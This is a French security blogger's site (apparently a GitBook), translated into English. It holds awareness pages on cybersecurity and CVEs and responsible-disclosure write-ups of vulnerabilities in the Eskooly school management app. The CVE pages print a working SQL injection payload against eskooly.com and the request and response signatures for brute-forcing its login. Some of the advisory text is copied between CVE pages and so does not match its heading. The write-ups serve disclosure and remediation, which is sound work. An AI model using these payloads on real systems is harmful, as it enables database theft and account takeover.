# BE-Hacktive

Welcome to the blog where you can learn about and understand cybersecurity in its many forms.

![](/files/-Mk9x8gRBTYCAs9FoqkM)

**CYBERSECURITY**, a common word that's been very much in vogue lately, but remains rather vague and little understood. BE HACKTIVE is a cybersecurity learning blog that will cover the various topics related to the theme of computer security via articles, tutorials, videos, etc.

## Learning

To provide as much information as possible for different profiles, I'm proposing a capsule system. Each capsule will answer a number of cybersecurity-related questions and issues.

Let's take the first capsule, for example, which will focus on cyber-security awareness. Here is a non-exhaustive list of topics:

* **Phishing**
* **Malware/Malicious software**
* **Passwords/Les mots passe**

This theme will cover topics that will help you to understand the different threats that each user/company faces, and to improve your knowledge in this field.

Naturally, you'll be asked to participate by asking questions, suggesting topics or giving your opinion.

## Send your question

If you have any questions about cybersecurity, please don't hesitate to contact me via the following link:

* [I have a question](/contact) ❓

To conclude this introduction, do you think you've ever been a target of cyber attacks?

![](/files/-MkYyHM4w9XREGy1SsHK)


# About the author and the project

## Hello

I'm Alaaedine Chatri, cybersecurity consultant at [Excellium Services S.A](https://excellium-services.com/). and ethical hacker.

Usually, when I introduce myself in this way, one of the first questions I'm asked is:

> *Can you hack a Facebook/Instagram/Snap account?*

**🚨 Spoiler alert:** The answer is YES and NO. I will of course give you a more detailed explanation later.

As I'm passionate about cybersecurity and hacking, I wanted to share all this. It's been several months (more than a year to be precise) since the basic idea came to me. It took several attempts before you could read these few lines.

> Are you going to explain the purpose of your project instead of just telling us your story?&#x20;

Yes, the aim of the project is to make cybersecurity accessible to everyone, from your grandparents to your children, from your neighbor's goldfish to those who already have a basic understanding of computer security. **All in French, dear readers.**

## Curriculum vitae

For those who would like to get to know me a little better 😀

## Studies

* CESS in Science at Athénée Emile Bockstael
* Bachelor's degree in business informatics at HEB-ESI
* Master in Computer Science at ULB (Université libre de Bruxelles) - AI and Security

## Experiences

Here's a short summary of my professional experiences, which you can find 👉 [HERE ](https://www.linkedin.com/in/alaaedine-chatri-284b22102/)👈:

* SOC Engineer chez Sopra Steria
* Pentester at Nviso
* Pentester et Team Leader chez Redcatus
* Cybersecurity Consultant and Delivery Manager at Excellium Services

## Training and Certifications

* SEC560 : Test de pénétration des réseaux et piratage éthique
* Testeur de pénétration GIAC (GPEN)
* Professionnel certifié en sécurité offensive - En cours


# Table of contents

The blog topics are listed below.

## Synopsis

| Title                                                                                                    | Description                                                                   |
| -------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------- |
| [Technology over time](https://be-hacktive.gitbook.io/docs/french/synopsis/la-technologie-dans-le-temps) | The evolution of technology over time leads to the question of cybersecurity. |
| [Cybersecurity](https://be-hacktive.gitbook.io/docs/french/synopsis/cybersecurite)                       | Definitions of cybersecurity and cybercrime terms.                            |

## Capsules

### Tip 1 - Raising awareness

| Title                                                                                            | Description                                                                           |
| ------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------- |
| [**Phishing**](https://be-hacktive.gitbook.io/docs/french/synopsis/la-technologie-dans-le-temps) | Definition, origin, evolution, techniques and protection. All about phishing          |
| [**Malware**](/tip-1-raising-awareness/malware)                                                  | Definition, origin, evolution, categories and RANSOMWARE are covered in this section. |
| [**Passowrds**](/tip-1-raising-awareness/passwords)                                              | Definition, evolution, statistics and protection                                      |

## Articles

| Titre                                                                                                                                                                                           | Description                                                                         |
| ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------- |
| [Am I a victim of data leakage?](https://be-hacktive.gitbook.io/docs/french/articles/suis-je-victime-des-fuites-de-donnees)                                                                     | Check whether your data is on the Internet and what to do about it.                 |
| [LOG4J: The vulnerable bookshop that's shaking up the world](https://be-hacktive.gitbook.io/docs/french/articles/log4j-la-librairie-vulnerable-qui-secoue-la-planete)                           | Definition and explanation of Log4j issues.                                         |
| [LOG4SHELL: VENI,VIDI,VICI](https://be-hacktive.gitbook.io/docs/french/articles/log4shell-veni-vidi-vici)                                                                                       | Understand, detect and exploit Log4shell.                                           |
| [Microsoft insists on the urgency of patching local Exchange servers](https://be-hacktive.gitbook.io/docs/french/news/microsoft-insiste-sur-lurgence-de-patcher-les-serveurs-exchange-en-local) | Urgent warning from Microsoft about the importance of updates for Exchange servers. |

## News

| Title                                                                                                                                                                                           | Description                                                                                                                                                                                                      |
| ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| [Microsoft insists on the urgency of patching local Exchange servers](https://be-hacktive.gitbook.io/docs/french/news/microsoft-insiste-sur-lurgence-de-patcher-les-serveurs-exchange-en-local) | Microsoft today urged its customers to keep their “on-premises Exchange servers” patched with the latest supported cumulative update (CU), so that they are always ready to deploy an emergency security update. |


# Contact

If you have any questions, don't hesitate to send me an e-mail via the contact form below or via one of the BE-Hacktive social networks.

{% embed url="<https://forms.gle/2Yco52zKQ2kihjfh6>" %}


# Technology over time

Technology has evolved and will continue to evolve, with all its good and bad points.

## Technological developments

Technological progress isn't the only thing increasing at an exponential rate: the speed at which newly commercialized technologies are adopted by consumers is also accelerating.

In the modern world, with increased connectivity, instant communication and infrastructure systems already in place, new ideas and products can spread at a speed never seen before, allowing a new product to reach consumers' hands in the blink of an eye.

Here's a graph showing how long it will take for the technologies mentioned to reach 50 million users (Ref: [Visual Capitalist](https://www.visualcapitalist.com/)):

![The number of years needed for a technology to reach 50 million users.urs](/files/-MkDIzNuvfQgNKpxkOJe)

Before the advent of the Internet and digitalization, the use of a product could only spread as fast as you could manufacture the physical good. First, you needed several million dollars/francs, a factory, manpower and inventory. Then, once the product was ready for distribution, you needed mass advertising, word-of-mouth, sales channels and media coverage to have a chance.

In our graph we can see that cars took 62 years to be adopted by 50 million users. It took 28 years for credit cards to be used by 50 million people, 22 years for television, 12 for cell phones and just 19 days for Pokémon Go.

## The modern era

In the modern era, therefore, there are new products that require no physical production, such as web or smartphone applications. Simply produce a useful piece of code that can be replicated or reused indefinitely at near-zero marginal cost, and it can spread like wildfire.

The applications offer a number of facilities, such as :

* Access to information
  * The media have their own applications for conveying news
* Communication
  * We can talk to each other by email, messenger or videoconference.
* Payments
  * E-commerce has made online shopping easier

A European study shows that in 2019, 89% of people aged 16 to 74 in the EU had used the internet, 72% of whom had bought or ordered goods or services for private use. (Ref: [Eurostat](https://ec.europa.eu/eurostat/))

Applications and the Internet are part of our daily lives, whether for professional or personal reasons.

We use them to send a message to our family on a WhatsApp group, buy a gift on Amazon or send and receive e-mails on our computer, smartphone or tablet. We can therefore say that this evolution brings many positive points, as technologies can be more rapidly deployed and more easily accessible to a large number of users, but there is always a dark side:

![This image hides a double meaning (to be explained in a future episode)](/files/-MkFRU1E51XwDXxa_vps)

We'll be illuminating this darkness as we travel together.


# Cybersecurity

## Definition

### Cybersecurity

First, let's define a few important concepts:

* French Information Systems Security Agency ([ANSSI](https://www.ssi.gouv.fr/entreprise/glossaire/c/#:~:text=Cybers%C3%A9curit%C3%A9\&text=La%20cybers%C3%A9curit%C3%A9%20fait%20appel%20%C3%A0,en%20place%20d'une%20cyberd%C3%A9fense))

{% hint style="success" %}
Cybersecurity calls on information systems security techniques and is based on the fight against cybercrime and the implementation of cyberdefense.
{% endhint %}

* Centre pour la cybersécurité en Belgique ([CCB](https://ccb.belgium.be/fr))

{% hint style="success" %}
Cybersecurity is the result of a set of security measures designed to minimize the risk of disrupted and unauthorized access to information and communication systems.
{% endhint %}

In short, cybersecurity helps protect companies and users from cyberattacks and cybercriminals.

## Cybercrime

{% hint style="success" %}
La **cybercriminalité** regroupe toutes les infractions pénales susceptibles de se commettre on or through a computer system generally connected to a network.
{% endhint %}

Cybercrime can be broken down into 3 types of offence:

* Offences specific to information and communication technologies :
  * Bank card offences
  * Data interception
* Offences related to information and communication technologies :
  * Child pornography
  * Incitement to terrorism and racial hatred on the Internet
  * Damage to persons or property
* Offences facilitated by information and communication technologies :
  * Online scams
  * Counterfeiting&#x20;
  * Intellectual property infringement

{% hint style="success" %}
By definition, a cybercriminal is a person who commits, with or without intent, one (or more) of the offences listed above without the explicit authorization of the third party concerned, regardless of the intent or objective pursued.
{% endhint %}

The end goal of a cybercriminal could be very diverse:

* Earning money
* Terrorizing the population
* Attacking a state for political, military or espionage purposes
* To show off your skills or for a challenge

## Cyberattack

{% hint style="success" %}
A cyber attack targets Information Systems (IS) or companies dependent on technology and networks in order to steal, modify or destroy a sensitive system.
{% endhint %}

We have already been directly or indirectly confronted with cyber attacks:

* An e-mail from someone we know but with whom we haven't had contact for a long time. In this e-mail she asks us to help her financially as she is ill and has no money.
* The e-mail that tells us we've entered a competition and won the latest smartphone or some cash.
* A text message asking us to log in to collect our parcel from the post office.
* A call from a foreign number.

![](/files/-MkK5MisUzRwi44ZnbUe)

Now you know what cybersecurity and cybercriminals are. My ultimate goal is to provide you with answers to your questions and tools to develop this field in the French-speaking world. A lot of literature exists in English for theory and practice, and I'd like to make it more easily accessible to French-speaking readers.


# CVE

Common Vulnerabilities and Exposures

<figure><img src="/files/aq28xNTkXIynrAAoH5eQ" alt=""><figcaption></figcaption></figure>

## Introduction&#x20;

CVEs, or Common Vulnerabilities and Exposures, are unique identifiers assigned to specific software or system vulnerabilities. Their creation is intended to standardize the way vulnerabilities are referenced and shared within the cybersecurity community. The CVE initiative was launched by the MITRE Corporation in 1999 to facilitate the sharing of critical information on security flaws, enabling organizations to better protect themselves against cyber threats.

## How CVEs work

CVEs are assigned by organizations called CVE Numbering Authorities (CNAs). Once a vulnerability has been identified, it is submitted to a CNA, which verifies its authenticity before assigning it a unique identifier. This process ensures that each CVE is unique, and that information is shared in a standardized way.

The CVE database, maintained by the MITRE, centralizes all registered vulnerabilities, enabling security researchers and IT professionals to consult and track known vulnerabilities. Each CVE contains a description of the vulnerability, information on the software or systems affected, and references to patches or workarounds.

<figure><img src="/files/w8PETSu9vCtSegvYZFtB" alt=""><figcaption><p>CVE.MITRE.ORG</p></figcaption></figure>

## Importance of CVEs

CVEs play a crucial role in security risk management. By identifying and cataloguing vulnerabilities, they enable organizations to prioritize security updates and patches. By understanding which vulnerabilities exist and how they can be exploited, companies can better protect their systems against cyber-attacks.

Security updates and patches are often triggered by CVEs. When a new vulnerability is discovered, developers work quickly to create patches which are then deployed to mitigate the risks.

## Number of CVEs between 2009 and 2023

According to a study by STATISTA 2024, the number of common computer security vulnerabilities and exposures (CVEs) is on the rise.

<figure><img src="/files/LwzW1ihA8ZYoaHd7gaUY" alt=""><figcaption><p>Number of current computer security vulnerabilities and exposures (CVEs) worldwide from 2009 to 2023</p></figcaption></figure>

## How to publish a CVE

Submitting a new vulnerability for assignment of a CVE follows a well-defined process. Steps include discovery of the vulnerability, full documentation of technical details, and submission to a NAC for verification. Once validated, the vulnerability receives a CVE number and is added to the database.

Just go to <https://cveform.mitre.org> and register your CVE, and that's it?

<figure><img src="/files/YKMvnzOPKLgccPUSJDS4" alt=""><figcaption></figcaption></figure>

Not really. First of all, you have to fill in a certain amount of information.

<figure><img src="/files/iBOnukzDNn5eyOgMhr9L" alt=""><figcaption></figcaption></figure>

The best resource for understanding and completing the form:

* ["Key Details Phrasing" by Jonathan Evans, MITRE](https://cveproject.github.io/docs/content/key-details-phrasing.pdf)

After filling in the web form, we receive confirmation that the CVE(s) is/are registered and we get a number like CVE-YEAR-NUMBER (CVE-2024-XXXXX). This will not be published until a release has been sent for the vulnerability, so in the meantime you can/should contact the vendor to have the problem resolved. Publication can be carried out by the vendor if the response is present within the timeframe we've chosen, otherwise publish it ourselves:

* On your blog
* Via Exploit-DB
* etc...

<mark style="color:yellow;">**❗❗❗**</mark>**&#x20;**<mark style="color:red;background-color:yellow;">**ATTENTION**</mark>**&#x20;**<mark style="color:yellow;">**❗❗❗**</mark>

It is VERY strongly inadvisable to publish yourself without first making several attempts to establish contact with the seller and ensure that he really understands the vulnerability.

**This is an essential point, as CVEs are supposed to help improve safety, not reduce it.**

## Notify CVE of your publication

Last step: Go back to <https://cveform.mitre.org/>, but this time select “Notify CVE About a Publication”. Share the link to your article. The CVE team verifies the publication and updates its database, consolidating your contribution.

<figure><img src="/files/OM8FVrDtlnEbTRIKHfsV" alt=""><figcaption></figcaption></figure>

## Conclusion

CVEs are essential for maintaining the security of IT systems. By standardizing the way vulnerabilities are identified and shared, they help prevent cyber-attacks and protect sensitive data. For those wishing to expand their knowledge, there are numerous resources available to explore the subject in greater detail.

* [**MITRE CORPORATION - CVE**](https://cve.mitre.org/)
* [**NATIONAL VULNERABILITY DATABASE - NIST**](https://nvd.nist.gov/)
* [**CVEDetails.com**](https://cvedetails.com/)


# ESKOOLY

<figure><img src="/files/A018arYzEuEtNg1o61Dx" alt=""><figcaption></figcaption></figure>

## Dates

* Tests: Between February 17 and 19, 2024
* Reporting: February 20, 2024
* CVE Request: April 05, 2024
* Publication of vulnerabilities: 02 July 2024 (after validation by ESKOOLY)&#x20;

## Eskooly vulnerability discovery story

### **Introduction**

I've always been passionate about cybersecurity, and this weekend of February 17 and 18, I had the opportunity to put my skills into practice outside my day job. A friend had asked me to check the security of a free school management application he'd found, called Eskooly. His main concern was the application's security, in particular the possibility of students stealing information or modifying their grades.

### **The adventure begins**

I liked the idea right away. A cyberseurity challenge was exactly what I needed. So I decided to spend my weekend to the task.

<div data-full-width="true"><figure><img src="/files/d3qxCqzeaCAq6Fdso9BE" alt=""><figcaption></figcaption></figure></div>

### **Using automated tools**

To get started, I used several well-known automated tools in the cybersecurity field:

* [**BURP (see the tutorial in Capsule 3)**](/capsule-3-tools/burp-suite): A tool for testing web vulnerabilities.
* **NMAP**: A port and service scanner.
* **SQLMAP**: A tool for detecting and exploiting SQL vulnerabilities.

These tools enabled me to save time by automating some of the security testing. However, automation has its limits, and it is often necessary to add a layer of manual testing to discover more complex vulnerabilities.

## **Discovering vulnerabilities**

After several hours of testing, I began to find some interesting vulnerabilities. Among the critical vulnerabilities discovered, here are a few examples:

* **SQL Injection**: This flaw made it possible to interfere with the application's SQL queries, potentially giving access to the entire database.
* **Broken Authentication**: Lack of account locking policy after several failed login attempts, opening the door to brute-force attacks.
* **Cross-site scripting (XSS)**: Allowed the injection of malicious scripts into web pages viewed by other users, compromising their accounts.
* **Incorrect configuration of security headers**: Several security headers essential for protecting the application against various attacks were missing.

These vulnerabilities exposed critical information such as platform users' unencrypted logins and passwords, posing a major security risk.

## **Writing and submitting the report**

On February 20, I wrote a full PENTEST report detailing all the vulnerabilities discovered and recommendations for correcting them. This report was sent directly to the Eskooly vendor.

<figure><img src="/files/TbFFEY6H0XLQRvMSoKmT" alt=""><figcaption></figcaption></figure>

## Collaboration with the supplier

The vendor contacted me the next day, February 21, to discuss the findings. He accepted the report and asked for my help in resolving the issues identified.

<figure><img src="/files/ycl2HYVgEkFO8CyMI3FQ" alt=""><figcaption></figcaption></figure>

## Publication of vulnerabilities

On April 5, 2024, the discovered vulnerabilities were published on the MITRE CVE platform. Since then, we've been working closely together to improve the application's security. On July 2, 2024, the supplier gave me the go-ahead to publish these findings, enabling the CVEs to be validated and officially published.

## Conclusion

It was a rewarding experience to dive into this security project, discover critical vulnerabilities, and work with the vendor to fix them. In the following articles, we'll explore in more detail how these vulnerabilities were found, exploited and, most importantly, how to remedy them.


# CVE-2024-27709 - SQL Injection in Eskooly Web Product v.3.0

<figure><img src="/files/9FcHTl4Q4Nyv1Ltren9y" alt="SQL Injection"><figcaption></figcaption></figure>

## **Introduction**

The application is vulnerable to SQL Injection, a critical security flaw that allows an attacker to interfere with the queries that an application makes to its database.&#x20;

Typically, it allows an attacker to view data that they are not normally able to retrieve, such as other users' data, or any other data that the application itself is able to access. In some cases, SQL Injection can even be used to execute administrative operations on the database, such as shutdown commands or data deletion.&#x20;

In the case of Eskooly application, all database has been dumped.

## **Discovery of the Vulnerability**

CVE-2024-27709 was discovered during a routine security assessment of Eskooly Web Product v.3.0. The vulnerability resides in the `allstudents.php` and `requestmanager.php` components of the application, specifically within the `searchby` and `id` parameters. These parameters were found to be improperly sanitized, allowing malicious input to manipulate SQL queries.

### **Technical Details**

An attacker can exploit this vulnerability by injecting arbitrary SQL code through the `searchby` parameter of the `allstudents.php` component and the `id` parameter of the `requestmanager.php` component. This allows the attacker to execute arbitrary SQL commands on the database, potentially leading to data exfiltration, unauthorized access, and even complete database compromise.

* A POST request to allstudents.php includes a searchby parameter that appears to be injectable, as indicated by the suspicious payload and the error message displayed.

```
POST /bb/allstudents.php HTTP/2
Host: eskooly.com
Cookie:
--SNIP--

--SNIP--

searchby=148999'+and+1%3d2%23&searchclass=
```

* An error message from the application suggests that the input from the searchby parameter is being interpreted as SQL code, indicating a lack of proper input sanitization.

<figure><img src="/files/EPoQGvdilW43YkXWVEXb" alt=""><figcaption></figcaption></figure>

* Using SQLMap, it was possible to retrieve the right payload and dump all information.

<figure><img src="/files/OKoKWPSaGeo7slGB8XAv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TX1ZQpdUuR7ol2nIOhHB" alt=""><figcaption></figcaption></figure>

## Risk

### Impact

**Critical.**&#x20;

SQLi permits attackers to get access to the database and dump sensitive data.&#x20;

### Likelihood

**High**.&#x20;

An attacker who created an account could easily exploit the SQL injection without requiring any additional privileges or user interaction using an automatic scanning tool.

## Recommendation&#x20;

To address the identified SQL injection vulnerability, it is recommended to implement parameterized queries for all database interactions. This approach separates the command structure from the data, ensuring that user input does not modify SQL execution. All user input should be configured as a consistent security measure.&#x20;

Although quote escaping and using stored procedures are common practices, they are not secure and should not be relied upon alone. It is essential to carry out regular updates and follow secure coding standards in the application's interactions with the database.

## References

* [**CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')** ](https://cwe.mitre.org/data/definitions/89.html)
* [**OWASP: SQL Injection**](https://owasp.org/www-community/attacks/SQL_Injection)
* [**OWASP: Injection Prevention Cheat Sheet**](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html)


# ESkooly - Broken Authentication

<figure><img src="/files/pvw7MyHNzIJ1ygB9O5zS" alt=""><figcaption></figcaption></figure>

## Introduction

&#x20;Authentication mechanisms are critical to securing any web application. Broken authentication vulnerabilities can lead to unauthorized access and privilege escalation, posing significant security risks. This post delves into the broken authentication findings from the Eskooly security report and explains the associated CVEs, highlighting how these vulnerabilities were discovered and their potential impacts.

## Broken Authentication Findings

The security assessment of Eskooly Free Online School Management Software v.3.0 revealed several critical vulnerabilities under the category of "Broken Authentication." These vulnerabilities include issues like weak password policies, lack of multi-factor authentication (MFA), inadequate account lockout mechanisms, and improper handling of user accounts and HTTP response headers.

### Key Findings

1. Brute Force Attack

* Description:&#x20;

The system allows unlimited login attempts without locking out the account after several failed attempts, making it vulnerable to brute force attacks.&#x20;

* Impact:&#x20;

An attacker can repeatedly attempt passwords until they find the correct one, leading to unauthorized access.&#x20;

* Linked CVE:&#x20;

  * [**CVE-2024-27710**](/eskooly-cve/eskooly-broken-authentication/cve-2024-27710-privilege-escalation-via-authentication-mechanism-in-eskooly-web-product-less-than-v3)

* Example Exploitation:&#x20;

An attacker can perform a brute-force attack on the login endpoint, trying different password combinations until successful.&#x20;

2. Weak Password Policy&#x20;

* Description:&#x20;

The application enforces weak password policies that do not require complex passwords, making it easier for attackers to guess passwords.&#x20;

* Impact:&#x20;

Increases the likelihood of successful brute-force and dictionary attacks.&#x20;

* Linked CVE:&#x20;

  * [**CVE-2024-27710**](/eskooly-cve/eskooly-broken-authentication/cve-2024-27710-privilege-escalation-via-authentication-mechanism-in-eskooly-web-product-less-than-v3)

* Example Exploitation:&#x20;

Registering and logging in with simple passwords like "123456" or "password" allows attackers to easily compromise accounts.&#x20;

3. No Account Lockout

* Description:&#x20;

The system does not lock accounts after multiple failed login attempts, allowing attackers to persist in brute force attacks.&#x20;

* Impact:&#x20;

Facilitates unauthorized access through persistent password guessing.&#x20;

* Linked CVE:&#x20;

  * [**CVE-2024-27710**](/eskooly-cve/eskooly-broken-authentication/cve-2024-27710-privilege-escalation-via-authentication-mechanism-in-eskooly-web-product-less-than-v3)

* Example Exploitation:&#x20;

An attacker can continually attempt to guess passwords for a user account without being locked out, eventually succeeding.&#x20;

4. Use of Single-Factor Authentication

* Description:&#x20;

The application relies solely on passwords for authentication, lacking the additional security provided by multi-factor authentication (MFA).&#x20;

* Impact:

Single-factor authentication makes it easier for attackers to gain access if passwords are compromised.&#x20;

* Linked CVE[: ](#introduction)

  * [**CVE-2024-27710**](#introduction)&#x20;

* Example Exploitation:&#x20;

An attacker who acquires a user's password through phishing or social engineering can log in without needing a second form of verification.&#x20;

5. Inadequate Password Update Verification

* Description:&#x20;

The system allows password changes without verifying the current password, making it easier for attackers to change user passwords if they gain initial access.&#x20;

* Impact:&#x20;

Facilitates account takeover if attackers can initiate password changes without the current password.&#x20;

* Linked CVE:&#x20;

  * CVE-2024-27715&#x20;

* Example Exploitation:&#x20;

An attacker logged in with a compromised session can change the account password without needing the original password, locking out the legitimate user. Impact of These Vulnerabilities:&#x20;

## Conclusion

The combined impact of these broken authentication vulnerabilities is severe. They allow attackers to:

Gain unauthorized access to user and administrative accounts. Escalate privileges within the application. Compromise sensitive user data and application integrity. Perform unauthorized actions, such as modifying or deleting data.


# CVE-2024-27710 - Privilege Escalation via Authentication Mechanism in Eskooly Web Product <= v3.0

<figure><img src="/files/1mf6QoSKDz4c5WUtOwQU" alt=""><figcaption></figcaption></figure>

## Introduction

A brute force attack involves systematically trying various password combinations against a server. Methods include dictionary and traditional brute-force attacks, using different character sets. The attack's duration depends on the chosen method and the efficiency of both attacking and targeted systems.

This attack is particularly effective against applications with weak security, such as those with poor password policies, no account lockout after multiple failed attempts, and no multi-factor authentication. These vulnerabilities allow attackers to persistently guess passwords, increasing the likelihood of a successful breach, in the Eskooly application.

## **Discovery of the Vulnerability**

CVE-2024-27710 was discovered during a security assessment of Eskooly’s authentication processes. The issue was identified as part of the broken authentication findings, particularly related to the lack of multi-factor authentication (MFA) and weak password policies.

### Related Findings

* Brute Force Attack
* Weak Password Policy
* No Account Lockout

### **Technical Details**

The vulnerability arises from insufficient security measures in the authentication process. Specifically, the absence of MFA and the use of weak passwords allow attackers to exploit authentication mechanisms. Attackers can perform brute-force attacks or use session hijacking techniques to gain unauthorized access.

#### Login password

* Preparation of the attack: Capture the POST request to signin

```
POST /bb/signin.php HTTP/2
HOST: eskooly.com
--SNIP--

--SNIP--

s=EMP&username=TEST&password=a&submit=
```

Now check the difference between bad password and the right one:

* &#x20;Bad Password
  * Status code 200 and 12169 < Length < 12192

<figure><img src="/files/PymOXbYxPS3XIshzyNMB" alt=""><figcaption></figcaption></figure>

* Correct password
  * Status code 302-Found and Length < 12169

<figure><img src="/files/OpfQgIVsuyYQCQUd3MwD" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**Critical.**&#x20;

If an attacker successfully guesses a user's password due to the lack of an account lockout policy, the impact can be considerable. The attacker would gain unauthorized access to the user's account, employees or admin. This unauthorized access could lead to data breaches, identity theft, and other malicious activities. The impact is heightened by the potential for the attacker to access not just a single account, but multiple accounts, especially if password practices across users are weak or uniform.&#x20;

### Likelihood&#x20;

**High.**

The absence of an account locking mechanism, combined with weak password policies and the absence of multi-factor authentication, considerably increases the probability of a successful brute force attack. The attacker, who is not bothered by the threat of account locking, can relentlessly attempt to guess the password, a situation further accentuated by simplistic or predictable passwords. The ease with which these attacks can be carried out, often using automated tools, further amplifies the risk of security breaches.

## Recommendation

It's recommended to:

* Implement a robust account lockout policy: After a certain number of unsuccessful login attempts, the account should be temporarily locked. This prevents continuous password guessing by an attacker.
* Enforce strong password policies: Require complex passwords that include a mix of uppercase and lowercase letters, numbers, and special characters. Regularly prompt users to change their passwords and prevent the reuse of old passwords.
* Enable multi-factor authentication (MFA): Adding an additional layer of security beyond just a password significantly reduces the risk of unauthorized access. Even if a password is compromised, the attacker would still need the second factor to gain access.
* Monitor and limit login attempts: Keep track of failed login attempts and set a threshold after which additional security measures are triggered, such as CAPTCHA verification or requiring additional authentication.
* Implement network-level security measures: Use firewalls and intrusion detection systems to monitor and block repeated login attempts from the same IP address.

## References

* [**CWE-307: Improper Restriction of Excessive Authentication Attempts**](https://cwe.mitre.org/data/definitions/307.html)&#x20;
* [**OWASP: Testing for Weak Lock Out Mechanism** ](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/04-Authentication_Testing/03-Testing_for_Weak_Lock_Out_Mechanism)
* [**OWASP: Blocking Brute Force Attacks**](https://owasp.org/www-community/controls/Blocking_Brute_Force_Attacks)


# CVE-2024-27711 - User Enumeration via Sign-up Process in Eskooly Web Product <= v3.0

<figure><img src="/files/R8KSaNGGYIODYLJii0eg" alt=""><figcaption></figcaption></figure>

## Introduction

Username enumeration is a common application vulnerability which occurs when an attacker can determine if usernames are valid or not. Most commonly, this issue occurs on login forms, where an error like “the username is invalid” is returned.

In this context, a student could enumerate VALID teacher account and using the CVE-2024-27710 he will escalate his/her privilege in the application.

## **Discovery of the Vulnerability**

CVE-2024-27711 was identified during a thorough security assessment of Eskooly’s user management and sign-up processes. The issue was found in the account settings where attackers could exploit the sign-up function to gain unauthorized access.

### Related Findings

* User Enumeration

### **Technical Details**

The vulnerability arises from flaws in the sign-up process that allow attackers to manipulate account settings during registration. This can lead to unauthorized privilege escalation, enabling attackers to register accounts with higher privileges than intended.

#### User enumeration during the Sign up

* It’s possible to enumerate admin account

<figure><img src="/files/BppKXKWOqcZ9FDm7kvYi" alt=""><figcaption></figcaption></figure>

Using this information and the findings related to CVE-2024-27710, a user/student could escalate his/her privilege and get admin access.

## Risk&#x20;

### Impact

**Medium.**&#x20;

The impact is high as the enumeration itself doesn't grant access but with all broken authentication vulnerabilities increases the risk of targeted attacks.

### Likelihood&#x20;

**High.**

Username enumeration in the Eskooly Web application is highly likely due to the explicit error message indicating existing usernames. Attackers can easily use this information to identify valid user accounts, which is a preliminary step in many attack vectors.

## **References**

* [**CWE-203: Observable Discrepancy**](https://cwe.mitre.org/data/definitions/203.html)
* [**OWASP: Testing for Account Enumeration and Guessable User Account**](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account)


# CVE-2024-27712 - User Enumeration via Account Settings in Eskooly Web Product <= v3.0

<figure><img src="/files/FvlGPXOnISDGUvOA0x1P" alt=""><figcaption></figcaption></figure>

## Introduction

Username enumeration is a common application vulnerability which occurs when an attacker can determine if usernames are valid or not. Most commonly, this issue occurs on login forms, where an error like “the username is invalid” is returned.

In this context, a student could enumerate VALID teacher account and using the CVE-2024-27710 he will escalate his/her privilege in the application.

## **Discovery of the Vulnerability**

CVE-2024-27711 was identified during a thorough security assessment of Eskooly’s user management and sign-up processes. The issue was found in the account settings where attackers could exploit the sign-up function to gain unauthorized access.

### Related Findings

* User Enumeration

### **Technical Details**

The vulnerability arises from flaws in the sign-up process that allow attackers to manipulate account settings during registration. This can lead to unauthorized privilege escalation, enabling attackers to register accounts with higher privileges than intended.

#### User enumeration during the Sign up

* It’s possible to enumerate admin account

<figure><img src="/files/zFibRMqyAqumAsNop4uc" alt=""><figcaption></figcaption></figure>

Using this information and the findings related to CVE-2024-27710, a user/student could escalate his/her privilege and get admin access.

## Risk&#x20;

### Impact

**Medium.**&#x20;

The impact is high as the enumeration itself doesn't grant access but with all broken authentication vulnerabilities increases the risk of targeted attacks.

### Likelihood&#x20;

**High.**

Username enumeration in the Eskooly Web application is highly likely due to the explicit error message indicating existing usernames. Attackers can easily use this information to identify valid user accounts, which is a preliminary step in many attack vectors.

## **References**

* [**CWE-203: Observable Discrepancy**](https://cwe.mitre.org/data/definitions/203.html)
* [**OWASP: Testing for Account Enumeration and Guessable User Account**](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account)


# CVE-2024-27713 - Protection mechanism Failure in Eskooly Web Product <= v3.0

<figure><img src="/files/lgpXwcHPLZcMQkyuD0Og" alt=""><figcaption></figcaption></figure>

## **Description**

Eskooly web application does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.

### Related Findings

* Security Headers Misconfiguration

### **Technical Details**

The vulnerability arises from flaws in the sign-up process that allow attackers to manipulate account settings during registration. This can lead to unauthorized privilege escalation, enabling attackers to register accounts with higher privileges than intended.

1. 8 Security headers are missing

<figure><img src="/files/Q0gObZ5m5tj66UVw84Sk" alt=""><figcaption></figcaption></figure>

2. No cookie protection

<figure><img src="/files/EkoQl1bjdTgfeReIRi0r" alt=""><figcaption></figcaption></figure>

## Risk&#x20;

### Impact

**Medium.**&#x20;

The absence of critical security headers such as X-Frame-Options, X-Content-Type-Options, Strict-Transport-Security, and others significantly increases the website's vulnerability to several types of attacks. Without X-Frame-Options, the site is susceptible to clickjacking attacks, where an attacker could trick a user into clicking on something different from what the user perceives, potentially leading to unauthorized actions. The lack of X-Content-Type-Options exposes the site to MIME type confusion attacks, where the browser might execute non-executable MIME types, leading to cross-site scripting (XSS) or other code execution attacks. Furthermore, not implementing Strict-Transport-Security can allow attackers to intercept or alter communications between the user and the website, compromising confidentiality and integrity. Each missing header contributes to an overall weakened security posture, making sensitive data and user interactions more prone to interception and manipulation.

### Likelihood&#x20;

**High.**

